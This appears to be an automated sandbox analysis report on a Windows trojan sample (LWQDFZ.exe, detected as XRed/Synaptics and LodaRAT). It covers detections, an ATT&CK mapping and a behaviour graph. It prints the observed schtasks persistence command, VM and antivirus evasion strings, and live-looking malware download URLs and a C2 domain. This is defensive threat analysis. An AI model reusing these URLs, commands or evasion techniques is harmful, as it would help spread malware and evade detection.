                              Source: KQNALS.exe, 0000000D.00000003.1536359255.00000000013D6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                              Source: ._cache_LWQDFZ.exe, 00000002.00000002.3025403510.0000000000F72000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, Synaptics.exe, 00000003.00000002.2445635497.000000000077E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2445635497.000000000074D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                              Source: Amcache.hve.23.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                              Source: Amcache.hve.23.drBinary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
                              Source: Amcache.hve.23.drBinary or memory string: c:/windows/system32/drivers/vmci.sys
                              Source: Amcache.hve.23.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                              Source: Amcache.hve.23.drBinary or memory string: vmci.sys
                              Source: Amcache.hve.23.drBinary or memory string: vmci.syshbin`
                              Source: Amcache.hve.23.drBinary or memory string: \driver\vmci,\driver\pci
                              Source: Amcache.hve.23.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                              Source: Amcache.hve.23.drBinary or memory string: VMware20,1
                              Source: Amcache.hve.23.drBinary or memory string: Microsoft Hyper-V Generation Counter
                              Source: Amcache.hve.23.drBinary or memory string: NECVMWar VMware SATA CD00
                              Source: Amcache.hve.23.drBinary or memory string: VMware Virtual disk SCSI Disk Device
                              Source: Amcache.hve.23.drBinary or memory string: VMware-42 27 c7 3b 45 a3 e4 a4-61 bc 19 7c 28 5c 10 19
                              Source: Amcache.hve.23.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
                              Source: Amcache.hve.23.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
                              Source: Amcache.hve.23.drBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
                              Source: Amcache.hve.23.drBinary or memory string: VMware PCI VMCI Bus Device
                              Source: Amcache.hve.23.drBinary or memory string: VMware VMCI Bus Device
                              Source: Amcache.hve.23.drBinary or memory string: VMware Virtual RAM
                              Source: Amcache.hve.23.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
                              Source: ._cache_LWQDFZ.exe, 00000002.00000002.3025403510.0000000000F72000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll~
                              Source: Amcache.hve.23.drBinary or memory string: vmci.inf_amd64_68ed49469341f563
                              Source: C:\Users\user\Desktop\._cache_LWQDFZ.exeAPI call chain: ExitProcess graph end nodegraph_2-103884
                              Source: C:\Users\user\Desktop\._cache_LWQDFZ.exeAPI call chain: ExitProcess graph end nodegraph_2-103137
                              Source: C:\Users\user\Desktop\._cache_LWQDFZ.exeProcess information queried: ProcessInformationJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeProcess queried: DebugPortJump to behavior
                              Source: C:\Users\user\Desktop\._cache_LWQDFZ.exeCode function: 2_2_003F703C BlockInput,2_2_003F703C
                              Source: C:\Users\user\Desktop\._cache_LWQDFZ.exeCode function: 2_2_003A374E GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetModuleFileNameW,GetForegroundWindow,ShellExecuteW,2_2_003A374E
                              Source: C:\Users\user\Desktop\._cache_LWQDFZ.exeCode function: 2_2_003D46D0 LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,IsDebuggerPresent,OutputDebugStringW,2_2_003D46D0
                              Source: C:\Users\user\Desktop\._cache_LWQDFZ.exeCode function: 2_2_005020B0 EntryPoint,LoadLibraryA,GetProcAddress,ExitProcess,VirtualProtect,VirtualProtect,VirtualProtect,2_2_005020B0
                              Source: C:\Users\user\Desktop\._cache_LWQDFZ.exeCode function: 2_2_003CA937 GetProcessHeap,2_2_003CA937
                              Source: C:\Users\user\Desktop\._cache_LWQDFZ.exeCode function: 2_2_003C8E3C SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_003C8E3C
                              Source: C:\Users\user\Desktop\._cache_LWQDFZ.exeCode function: 2_2_003C8E19 SetUnhandledExceptionFilter,2_2_003C8E19
                              Source: C:\Users\user\AppData\Roaming\Windata\KQNALS.exeCode function: 9_2_00698E3C SetUnhandledExceptionFilter,UnhandledExceptionFilter,9_2_00698E3C
                              Source: C:\Users\user\AppData\Roaming\Windata\KQNALS.exeCode function: 9_2_00698E19 SetUnhandledExceptionFilter,9_2_00698E19
                              Source: C:\Users\user\Desktop\._cache_LWQDFZ.exeCode function: 2_2_003DBE95 LogonUserW,2_2_003DBE95
                              Source: C:\Users\user\Desktop\._cache_LWQDFZ.exeCode function: 2_2_003A374E GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetModuleFileNameW,GetForegroundWindow,ShellExecuteW,2_2_003A374E
                              Source: C:\Users\user\Desktop\._cache_LWQDFZ.exeCode function: 2_2_003E4B52 SendInput,keybd_event,2_2_003E4B52
                              Source: C:\Users\user\Desktop\._cache_LWQDFZ.exeCode function: 2_2_003E7DD5 mouse_event,2_2_003E7DD5
                              Source: C:\Users\user\Desktop\LWQDFZ.exeProcess created: C:\Users\user\Desktop\._cache_LWQDFZ.exe "C:\Users\user\Desktop\._cache_LWQDFZ.exe" Jump to behavior
                              Source: C:\Users\user\Desktop\LWQDFZ.exeProcess created: C:\ProgramData\Synaptics\Synaptics.exe "C:\ProgramData\Synaptics\Synaptics.exe" InjUpdateJump to behavior
                              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /tn MHDFGY.exe /tr C:\Users\user\AppData\Roaming\Windata\KQNALS.exe /sc minute /mo 1
                              Source: C:\Users\user\Desktop\._cache_LWQDFZ.exeCode function: 2_2_003DB398 GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,RtlAllocateHeap,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,2_2_003DB398
                              Source: C:\Users\user\Desktop\._cache_LWQDFZ.exeCode function: 2_2_003DBE31 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,2_2_003DBE31
                              Source: ._cache_LWQDFZ.exe, KQNALS.exeBinary or memory string: Shell_TrayWnd
                              Source: ._cache_LWQDFZ.exe, 00000002.00000002.3019730804.000000000044E000.00000040.00000001.01000000.00000005.sdmp, KQNALS.exe, 00000009.00000002.1576283717.000000000071E000.00000040.00000001.01000000.00000009.sdmp, KQNALS.exe, 0000000D.00000002.1548134182.000000000071E000.00000040.00000001.01000000.00000009.sdmpBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndTHISREMOVEblankinfoquestionstopwarning
                              Source: C:\Users\user\Desktop\._cache_LWQDFZ.exeCode function: 2_2_003C7254 cpuid 2_2_003C7254
                              Source: C:\Users\user\Desktop\LWQDFZ.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion InstallDateJump to behavior
                              Source: C:\Users\user\Desktop\._cache_LWQDFZ.exeQueries volume information: C:\ VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\._cache_LWQDFZ.exeCode function: 2_2_003C40DA GetSystemTimeAsFileTime,__aulldiv,2_2_003C40DA
                              Source: C:\Users\user\Desktop\._cache_LWQDFZ.exeCode function: 2_2_0041C146 GetUserNameW,2_2_0041C146
                              Source: C:\Users\user\Desktop\._cache_LWQDFZ.exeCode function: 2_2_003D2C3C __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,2_2_003D2C3C
                              Source: C:\Users\user\Desktop\._cache_LWQDFZ.exeCode function: 2_2_003BE47B GetVersionExW,GetCurrentProcess,FreeLibrary,GetNativeSystemInfo,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo,2_2_003BE47B
                              Source: C:\Windows\SysWOW64\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                              Source: Amcache.hve.23.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
                              Source: Amcache.hve.23.drBinary or memory string: msmpeng.exe
                              Source: Amcache.hve.23.drBinary or memory string: c:\program files\windows defender\msmpeng.exe
                              Source: Amcache.hve.23.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23090.2008-0\msmpeng.exe
                              Source: Amcache.hve.23.drBinary or memory string: MsMpEng.exe
                              Source: C:\Users\user\Desktop\._cache_LWQDFZ.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntiVirusProduct

                              Stealing of Sensitive Information

                              barindex
                              Yara detected LodaRAT
                              Source: Yara matchFile source: Process Memory Space: ._cache_LWQDFZ.exe PID: 7436, type: MEMORYSTR
                              Yara detected XRed
                              Source: Yara matchFile source: LWQDFZ.exe, type: SAMPLE
                              Source: Yara matchFile source: 0.0.LWQDFZ.exe.400000.0.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 00000003.00000003.1511897808.000000000074E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000000.00000000.1390370601.0000000000401000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
                              Source: Yara matchFile source: Process Memory Space: LWQDFZ.exe PID: 7352, type: MEMORYSTR
                              Source: Yara matchFile source: Process Memory Space: Synaptics.exe PID: 7464, type: MEMORYSTR
                              Source: Yara matchFile source: C:\ProgramData\Synaptics\RCXFBD9.tmp, type: DROPPED
                              Source: Yara matchFile source: C:\Users\user\Documents\AIXACVYBSB\~$cache1, type: DROPPED
                              Source: Yara matchFile source: C:\ProgramData\Synaptics\Synaptics.exe, type: DROPPED
                              Source: KQNALS.exe, 00000014.00000002.1918681012.000000000071E000.00000040.00000001.01000000.00000009.sdmpBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 10, 2USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubytea
                              Source: KQNALS.exe, 00000014.00000002.1938661920.000000000435C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: WIN_81
                              Source: KQNALS.exeBinary or memory string: WIN_XP
                              Source: KQNALS.exe, 00000010.00000003.1713804910.00000000048E4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: WIN_81J
                              Source: KQNALS.exe, 00000011.00000002.1823458810.00000000046AD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: WIN_81h
                              Source: KQNALS.exeBinary or memory string: WIN_XPe
                              Source: KQNALS.exe, 0000000D.00000002.1569025019.00000000047EF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: WIN_81n>
                              Source: KQNALS.exeBinary or memory string: WIN_VISTA
                              Source: KQNALS.exeBinary or memory string: WIN_7
                              Source: KQNALS.exeBinary or memory string: WIN_8
                              Source: KQNALS.exe, 00000009.00000003.1514358348.00000000045DA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: WIN_81W
                              Source: Yara matchFile source: Process Memory Space: ._cache_LWQDFZ.exe PID: 7436, type: MEMORYSTR

                              Remote Access Functionality

                              barindex
                              Yara detected LodaRAT
                              Source: Yara matchFile source: Process Memory Space: ._cache_LWQDFZ.exe PID: 7436, type: MEMORYSTR
                              Yara detected XRed
                              Source: Yara matchFile source: LWQDFZ.exe, type: SAMPLE
                              Source: Yara matchFile source: 0.0.LWQDFZ.exe.400000.0.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 00000003.00000003.1511897808.000000000074E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000000.00000000.1390370601.0000000000401000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
                              Source: Yara matchFile source: Process Memory Space: LWQDFZ.exe PID: 7352, type: MEMORYSTR
                              Source: Yara matchFile source: Process Memory Space: Synaptics.exe PID: 7464, type: MEMORYSTR
                              Source: Yara matchFile source: C:\ProgramData\Synaptics\RCXFBD9.tmp, type: DROPPED
                              Source: Yara matchFile source: C:\Users\user\Documents\AIXACVYBSB\~$cache1, type: DROPPED
                              Source: Yara matchFile source: C:\ProgramData\Synaptics\Synaptics.exe, type: DROPPED
                              Source: C:\Users\user\Desktop\._cache_LWQDFZ.exeCode function: 2_2_003F91DC socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,2_2_003F91DC
                              Source: C:\Users\user\Desktop\._cache_LWQDFZ.exeCode function: 2_2_003F96E2 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,2_2_003F96E2
                              Source: C:\Users\user\AppData\Roaming\Windata\KQNALS.exeCode function: 9_2_006C91DC socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,9_2_006C91DC
                              Source: C:\Users\user\AppData\Roaming\Windata\KQNALS.exeCode function: 9_2_006C96E2 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,9_2_006C96E2

                              Mitre Att&ck Matrix

                              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                              Gather Victim Identity Information421
                              Scripting                              		2
                              Valid Accounts                              		11
                              Windows Management Instrumentation                              		421
                              Scripting                              		1
                              Exploitation for Privilege Escalation                              		1
                              Disable or Modify Tools                              		21
                              Input Capture                              		2
                              System Time Discovery                              		Remote Services1
                              Archive Collected Data                              		4
                              Ingress Tool Transfer                              		Exfiltration Over Other Network Medium1
                              System Shutdown/Reboot
                              CredentialsDomains1
                              Replication Through Removable Media                              		2
                              Native API                              		1
                              DLL Side-Loading                              		1
                              DLL Side-Loading                              		1
                              Deobfuscate/Decode Files or Information                              		LSASS Memory1
                              Peripheral Device Discovery                              		Remote Desktop Protocol21
                              Input Capture                              		11
                              Encrypted Channel                              		Exfiltration Over BluetoothNetwork Denial of Service
                              Email AddressesDNS ServerDomain Accounts1
                              Scheduled Task/Job                              		2
                              Valid Accounts                              		1
                              Extra Window Memory Injection                              		21
                              Obfuscated Files or Information                              		Security Account Manager1
                              Account Discovery                              		SMB/Windows Admin Shares3
                              Clipboard Data                              		3
                              Non-Application Layer Protocol                              		Automated ExfiltrationData Encrypted for Impact
                              Employee NamesVirtual Private ServerLocal AccountsCron1
                              Scheduled Task/Job                              		2
                              Valid Accounts                              		1
                              Software Packing                              		NTDS4
                              File and Directory Discovery                              		Distributed Component Object ModelInput Capture34
                              Application Layer Protocol                              		Traffic DuplicationData Destruction
                              Gather Victim Network InformationServerCloud AccountsLaunchd21
                              Registry Run Keys / Startup Folder                              		21
                              Access Token Manipulation                              		1
                              DLL Side-Loading                              		LSA Secrets38
                              System Information Discovery                              		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts12
                              Process Injection                              		1
                              Extra Window Memory Injection                              		Cached Domain Credentials261
                              Security Software Discovery                              		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                              DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup Items1
                              Scheduled Task/Job                              		12
                              Masquerading                              		DCSync131
                              Virtualization/Sandbox Evasion                              		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                              Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/Job21
                              Registry Run Keys / Startup Folder                              		2
                              Valid Accounts                              		Proc Filesystem3
                              Process Discovery                              		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                              Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt131
                              Virtualization/Sandbox Evasion                              		/etc/passwd and /etc/shadow11
                              Application Window Discovery                              		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                              IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron21
                              Access Token Manipulation                              		Network Sniffing1
                              System Owner/User Discovery                              		Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
                              Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchd12
                              Process Injection                              		Input CaptureSystem Network Connections DiscoverySoftware Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption

                              Behavior Graph

                              Hide Legend

                              Legend:

                              • Process
                              • Signature
                              • Created File
                              • DNS/IP Info
                              • Is Dropped
                              • Is Windows Process
                              • Number of created Registry Values
                              • Number of created Files
                              • Visual Basic
                              • Delphi
                              • Java
                              • .Net C# or VB.NET
                              • C, C++ or other language
                              • Is malicious
                              • Internet
                              behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1582337 Sample: LWQDFZ.exe Startdate: 30/12/2024 Architecture: WINDOWS Score: 100 55 freedns.afraid.org 2->55 57 xred.mooo.com 2->57 59 5 other IPs or domains 2->59 69 Suricata IDS alerts for network traffic 2->69 71 Found malware configuration 2->71 73 Antivirus detection for URL or domain 2->73 77 18 other signatures 2->77 9 LWQDFZ.exe 1 6 2->9         started        12 KQNALS.exe 2->12         started        15 EXCEL.EXE 231 70 2->15         started        17 5 other processes 2->17 signatures3 75 Uses dynamic DNS services 55->75 process4 file5 47 C:\Users\user\Desktop\._cache_LWQDFZ.exe, PE32 9->47 dropped 49 C:\ProgramData\Synaptics\Synaptics.exe, PE32 9->49 dropped 51 C:\ProgramData\Synaptics\RCXFBD9.tmp, PE32 9->51 dropped 53 C:\...\Synaptics.exe:Zone.Identifier, ASCII 9->53 dropped 19 ._cache_LWQDFZ.exe 2 5 9->19         started        24 Synaptics.exe 251 9->24         started        91 Multi AV Scanner detection for dropped file 12->91 93 Machine Learning detection for dropped file 12->93 95 Found API chain indicative of sandbox detection 12->95 signatures6 process7 dnsIp8 61 172.111.138.100, 49714, 49763, 49810 VOXILITYGB United States 19->61 41 C:\Users\user\AppData\Roaming\...\KQNALS.exe, PE32 19->41 dropped 43 C:\Users\user\AppData\Local\Temp\MHDFGY.vbs, ASCII 19->43 dropped 79 Multi AV Scanner detection for dropped file 19->79 81 Machine Learning detection for dropped file 19->81 26 cmd.exe 19->26         started        29 wscript.exe 19->29         started        63 docs.google.com 142.250.185.78, 443, 49712, 49713 GOOGLEUS United States 24->63 65 drive.usercontent.google.com 142.250.186.97, 443, 49720, 49721 GOOGLEUS United States 24->65 67 freedns.afraid.org 69.42.215.252, 49717, 80 AWKNET-LLCUS United States 24->67 45 C:\Users\user\Documents\AIXACVYBSB\~$cache1, PE32 24->45 dropped 83 Antivirus detection for dropped file 24->83 85 Drops PE files to the document folder of the user 24->85 31 WerFault.exe 24->31         started        33 WerFault.exe 24->33         started        35 WerFault.exe 24->35         started        file9 signatures10 process11 signatures12 87 Uses schtasks.exe or at.exe to add and modify task schedules 26->87 37 conhost.exe 26->37         started        39 schtasks.exe 26->39         started        89 Windows Scripting host queries suspicious COM object (likely to drop second stage) 29->89 process13

                              Screenshots

                              Thumbnails

                              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                              windows-stand

                              Antivirus, Machine Learning and Genetic Malware Detection

                              Initial Sample

                              SourceDetectionScannerLabelLink
                              LWQDFZ.exe92%ReversingLabsWin32.Trojan.Synaptics
                              LWQDFZ.exe100%AviraTR/Dldr.Agent.SH
                              LWQDFZ.exe100%AviraW2000M/Dldr.Agent.17651006
                              LWQDFZ.exe100%Joe Sandbox ML

                              Dropped Files

                              SourceDetectionScannerLabelLink
                              C:\ProgramData\Synaptics\Synaptics.exe100%AviraTR/Dldr.Agent.SH
                              C:\ProgramData\Synaptics\Synaptics.exe100%AviraW2000M/Dldr.Agent.17651006
                              C:\ProgramData\Synaptics\RCXFBD9.tmp100%AviraTR/Dldr.Agent.SH
                              C:\ProgramData\Synaptics\RCXFBD9.tmp100%AviraW2000M/Dldr.Agent.17651006
                              C:\Users\user\Documents\AIXACVYBSB\~$cache1100%AviraTR/Dldr.Agent.SH
                              C:\Users\user\Documents\AIXACVYBSB\~$cache1100%AviraW2000M/Dldr.Agent.17651006
                              C:\Users\user\AppData\Local\Temp\MHDFGY.vbs100%AviraVBS/Runner.VPJI
                              C:\Users\user\Desktop\._cache_LWQDFZ.exe100%Joe Sandbox ML
                              C:\Users\user\AppData\Roaming\Windata\KQNALS.exe100%Joe Sandbox ML
                              C:\ProgramData\Synaptics\Synaptics.exe100%Joe Sandbox ML
                              C:\ProgramData\Synaptics\RCXFBD9.tmp100%Joe Sandbox ML
                              C:\Users\user\Documents\AIXACVYBSB\~$cache1100%Joe Sandbox ML
                              C:\ProgramData\Synaptics\RCXFBD9.tmp100%ReversingLabsWin32.Worm.Zorex
                              C:\ProgramData\Synaptics\Synaptics.exe92%ReversingLabsWin32.Trojan.Synaptics
                              C:\Users\user\AppData\Roaming\Windata\KQNALS.exe53%ReversingLabsWin32.Trojan.Lisk
                              C:\Users\user\Desktop\._cache_LWQDFZ.exe53%ReversingLabsWin32.Trojan.Lisk
                              C:\Users\user\Documents\AIXACVYBSB\~$cache1100%ReversingLabsWin32.Worm.Zorex

                              Unpacked PE Files

                              No Antivirus matches

                              Domains

                              No Antivirus matches

                              URLs

                              SourceDetectionScannerLabelLink
                              http://xred.site50.net/syn/Synaptics.rarh100%Avira URL Cloudmalware
                              http://xred.site50.net/syn/SSLLibrary.dlD100%Avira URL Cloudmalware

                              Domains and IPs

                              Contacted Domains

                              NameIPActiveMaliciousAntivirus DetectionReputation
                              freedns.afraid.org
                              		69.42.215.252
                              		truefalse
                                		high
                                docs.google.com
                                		142.250.185.78
                                		truefalse
                                  		high
                                  s-part-0017.t-0009.fb-t-msedge.net
                                  		13.107.253.45
                                  		truefalse
                                    		high
                                    drive.usercontent.google.com
                                    		142.250.186.97
                                    		truefalse
                                      		high
                                      xred.mooo.com
                                      		unknown
                                      		unknownfalse
                                        		high

                                        Contacted URLs

                                        NameMaliciousAntivirus DetectionReputation
                                        xred.mooo.comfalse
                                          		high
                                          http://freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978false
                                            		high

                                            URLs from Memory and Binaries

                                            NameSourceMaliciousAntivirus DetectionReputation
                                            https://www.dropbox.com/s/fzj752whr3ontsm/SSLLibrary.dll?dl=LWQDFZ.exe, 00000000.00000003.1398437045.00000000021E0000.00000004.00001000.00020000.00000000.sdmpfalse
                                              		high
                                              http://freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978_Synaptics.exe, 00000003.00000002.2445635497.000000000071A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                		high
                                                http://xred.site50.net/syn/Synaptics.rarZSynaptics.exe, 00000003.00000002.2463631330.0000000002120000.00000004.00001000.00020000.00000000.sdmpfalse
                                                  		high
                                                  https://www.dropbox.com/s/n1w4p8gc6jzo0sg/SUpdate.ini?dl=1LWQDFZ.exefalse
                                                    		high
                                                    https://docs.google.com/uc?id=0BSynaptics.exe, 00000003.00000002.2756730051.000000000EEC2000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      		high
                                                      https://www.dropbox.com/s/fzj752whr3ontsm/SSLLibrary.dll?dl=1:Synaptics.exe, 00000003.00000002.2463631330.0000000002120000.00000004.00001000.00020000.00000000.sdmpfalse
                                                        		high
                                                        https://drive.usercontent.google.com/Synaptics.exe, 00000003.00000002.2674608075.0000000005A7E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.1613364424.0000000005A82000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          		high
                                                          http://upx.sf.netAmcache.hve.23.drfalse
                                                            		high
                                                            http://xred.site50.net/syn/Synaptics.rarLWQDFZ.exefalse
                                                              		high
                                                              https://docs.google.com/google.com/leclick-cn.netSynaptics.exe, 00000003.00000003.1612400526.0000000005AA7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                		high
                                                                http://xred.site50.net/syn/Synaptics.rarhLWQDFZ.exe, 00000000.00000003.1398437045.00000000021E0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                • Avira URL Cloud: malware
                                                                		unknown
                                                                https://docs.google.com/Synaptics.exe, 00000003.00000003.1612400526.0000000005AA7000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2445635497.000000000072D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  https://www.dropbox.com/s/n1w4p8gc6jzo0sg/SUpdate.ini?dlXLWQDFZ.exe, 00000000.00000003.1398437045.00000000021E0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    http://xred.site50.net/syn/SSLLibrary.dll6Synaptics.exe, 00000003.00000002.2463631330.0000000002120000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      https://www.dropbox.com/s/zhp1b06imehwylq/Synaptics.rar?dl=1:Synaptics.exe, 00000003.00000002.2463631330.0000000002120000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                        		high
                                                                        http://xred.site50.net/syn/SSLLibrary.dlDLWQDFZ.exe, 00000000.00000003.1398437045.00000000021E0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                        • Avira URL Cloud: malware
                                                                        		unknown
                                                                        https://www.dropbox.com/s/fzj752whr3ontsm/SSLLibrary.dll?dl=1LWQDFZ.exefalse
                                                                          		high
                                                                          https://www.dropbox.com/s/zhp1b06imehwylq/Synaptics.rar?dl=1LWQDFZ.exefalse
                                                                            		high
                                                                            http://xred.site50.net/syn/SUpdate.iniZSynaptics.exe, 00000003.00000002.2463631330.0000000002120000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                              		high
                                                                              http://xred.site50.net/syn/SUpdate.iniLWQDFZ.exefalse
                                                                                		high
                                                                                https://drive.usercontent.google.comSynaptics.exe, 00000003.00000003.1612400526.0000000005AA7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  		high
                                                                                  https://www.dropbox.com/s/n1w4p8gc6jzo0sg/SUpdate.ini?dl=16Synaptics.exe, 00000003.00000002.2463631330.0000000002120000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                    		high
                                                                                    https://drive.usercontent.google.com/~Synaptics.exe, 00000003.00000002.2674608075.0000000005A7E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.1613364424.0000000005A82000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      		high
                                                                                      http://freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978xLWQDFZ.exe, 00000000.00000003.1398437045.00000000021E0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                        		high
                                                                                        http://ip-score.com/checkip/108392S17108385S17108460._cache_LWQDFZ.exe, 00000002.00000002.3036420870.00000000041C1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                          		high
                                                                                          https://docs.google.com/t1.cSynaptics.exe, 00000003.00000003.1611905073.0000000005AB3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                            		high
                                                                                            http://xred.site50.net/syn/SSLLibrary.dllLWQDFZ.exefalse
                                                                                              		high
                                                                                              https://docs.google.com/google.com/googletagservices-cn.comSynaptics.exe, 00000003.00000003.1612400526.0000000005AA7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                		high

                                                                                                World Map of Contacted IPs

